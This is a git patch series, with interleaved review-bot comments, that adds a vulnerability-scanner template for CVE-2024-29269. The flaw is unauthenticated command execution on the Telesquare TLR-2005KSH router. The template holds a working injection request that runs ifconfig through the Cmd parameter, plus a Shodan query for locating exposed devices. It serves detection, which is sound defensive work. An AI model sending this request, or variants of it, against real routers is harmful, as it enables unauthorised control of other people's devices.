From 29001265cc3ac279711855a5a0db2df0387c4099 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 4 Apr 2024 22:58:45 +0530
Subject: [PATCH 1/3] Create CVE-2024-29269.yaml
---
http/cves/2024/CVE-2024-29269.yaml | 41 ++++++++++++++++++++++++++++++
1 file changed, 41 insertions(+)
create mode 100644 http/cves/2024/CVE-2024-29269.yaml
diff --git a/http/cves/2024/CVE-2024-29269.yaml b/http/cves/2024/CVE-2024-29269.yaml
new file mode 100644
index 0000000000..46d921fcb4
--- /dev/null
+++ b/http/cves/2024/CVE-2024-29269.yaml
@@ -0,0 +1,41 @@
+id: CVE-2024-29269
+
+info:
+ name: Telesquare TLR-2005KSH - Remote Command Execution
+ author: ritikchaddha
+ severity: critical
+ description: |
+ Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.
+ reference:
+ - https://github.com/wutalent/CVE-2024-29269/blob/main/index.md
+ - https://gist.github.com/win3zz/c26047ae4b182c3619509d537b808d2b
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-29269
+ metadata:
+ max-request: 1
+ shodan-query: title:"Login to TLR-2005KSH"
+ tags: cve,cve2024,telesquare,tlr,rce
+
+http:
+ - raw:
+ - |
+ GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - ''
+ - ''
+
+ - type: word
+ part: header
+ words:
+ - 'text/xml'
+
+ - type: status
+ status:
+ - 200
From cc0874c50378d55396cc450c52cd1addc10cf691 Mon Sep 17 00:00:00 2001
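Review bot: The `info` block has no `remediation` entry, so a finding from this critical-severity template tells the operator what is exposed but not what to do about it. Add one after `description`, for example `remediation: Apply a vendor firmware update if one is available and restrict access to the router's web management interface to trusted networks.` The description also needs a space in `company.Telesquare` and spells the model three ways (`Tlr-2005Ksh`, `TLR-2005Ksh`, `TLR-2005KSH`); use the `TLR-2005KSH` form from `name` throughout. A `verified: true` entry under `metadata` is worth adding only if the matchers were checked against a real device.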
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 Apr 2024 23:06:17 +0530 Subject: [PATCH 2/3] matchers update --- http/cves/2024/CVE-2024-29269.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-29269.yaml b/http/cves/2024/CVE-2024-29269.yaml index 46d921fcb4..5fdcf3b853 100644 --- a/http/cves/2024/CVE-2024-29269.yaml +++ b/http/cves/2024/CVE-2024-29269.yaml @@ -21,15 +21,19 @@ info: http: - raw: - | - GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1 + GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfigff HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - - type: dsl - dsl: + - type: word + part: body + words: - '' - '' + - 'Ethernet' + - 'inet' + condition: and - type: word part: header From 603a507a22c113419dc7e0ce21eea02ec0cfe440 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 Apr 2024 23:16:28 +0530 Subject: [PATCH 3/3] fix typo --- http/cves/2024/CVE-2024-29269.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-29269.yaml b/http/cves/2024/CVE-2024-29269.yaml index 5fdcf3b853..419f7dddcf 100644 --- a/http/cves/2024/CVE-2024-29269.yaml +++ b/http/cves/2024/CVE-2024-29269.yaml @@ -21,7 +21,7 @@ info: http: - raw: - | - GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfigff HTTP/1.1 + GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1 Host: {{Hostname}} matchers-condition: and
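Review bot: The first two entries of the new body `words` list read as empty strings (`- ''`) on this page. An empty word would be contained in any body, so under `condition: and` only `'Ethernet'` and `'inet'` constrain the match. If those entries hold the XML wrapper of the command response in the real file (markup may have been stripped when this page was rendered), no change is needed; if they are really empty, delete both `- ''` lines or replace them with a literal from the device's response. `Ethernet` and `inet` alone are generic enough to appear in other `text/xml` status pages, so a third word specific to the command output would cut false positives. The matcher list continues past the end of this hunk.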